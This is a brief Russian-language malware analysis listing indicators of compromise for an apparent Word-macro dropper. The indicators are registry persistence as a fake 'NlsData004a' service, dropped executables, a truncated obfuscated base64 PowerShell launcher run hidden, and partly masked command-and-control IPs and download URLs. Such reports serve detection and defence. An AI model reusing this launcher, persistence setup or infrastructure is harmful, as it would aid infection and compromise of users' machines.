Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData004a] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData004a] 'ImagePath' = '"<SYSTEM32>\KBDFO\NlsData004a.exe"'
- 'NlsData004a' "<SYSTEM32>\KBDFO\NlsData004a.exe"
- 'NlsData004a' <SYSTEM32>\KBDFO\NlsData004a.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAG8AdgBmAHYAMgBuAD0AKAAnAEEAMwAnACsAKAAnAGcAZwAzACcAKwAnADgAdQAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAVABlAG0AUABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\uamrrgt.exe
- <SYSTEM32>\kbdfo\nlsdata004a.exe
- %TEMP%\word\2019\uamrrgt.exe в <SYSTEM32>\kbdfo\nlsdata004a.exe
- '88.##9.181.198':443
- '65.##6.53.186':8080
- http://in##d.vn/wp-content/BTAvhtA/
- http://65.###.53.186:8080/CWqWkIEORi86DNpa/UA6zk9fPxDDNy6afS2q/zmLG6WazIdukP/xzVZCs26Q9QUaon/4JRYANY6j95p6s/ via 65.##6.53.186
- DNS ASK in##d.vn
- '%TEMP%\word\2019\uamrrgt.exe'
- '<SYSTEM32>\kbdfo\nlsdata004a.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAG8AdgBmAHYAMgBuAD0AKAAnAEEAMwAnACsAKAAnAGcAZwAzACcAKwAnADgAdQAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAVABlAG0AUABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)